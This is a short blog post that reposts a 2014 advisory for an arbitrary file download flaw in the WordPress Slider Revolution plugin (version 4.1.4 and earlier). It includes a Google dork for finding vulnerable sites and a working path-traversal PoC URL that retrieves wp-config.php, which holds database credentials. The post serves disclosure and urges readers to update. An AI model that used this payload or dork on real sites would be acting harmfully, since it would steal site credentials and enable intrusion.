Slider Revolution Exploit

WordPress Plugin Slider Revolution
<= 4.1.4 – Arbitrary File Download vulnerability

Time to update if you are using the Slider Revolution plugin which can be obtained over at CodeCanyon. Not long ago an older version of it (3.0.95) was found to have a vulnerability also. The old version allowed for remote shell uploads, this was supposed to be fixed in newer releases. Well, they did fix it indeed, but at the same time seem to have added a new vulnerability to that plugin. I just wonder if i will find any log entries on my box, i guess i sure will hehe (eventhough this site quite clearly does not use Slider Revolution).

# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380

# Software Link : Premium plugin

# Dork Google: revslider.php “index of”

# Date : 2014-07-24

# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox

######################

# Description

WordPress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability

######################

# PoC

http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#####################

Discovered By : Claudio Viviani

http://www.homelab.it
[email protected]
[email protected]

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################

Be the first to comment on "Slider Revolution Exploit"

Leave a comment

Your email address will not be published.


*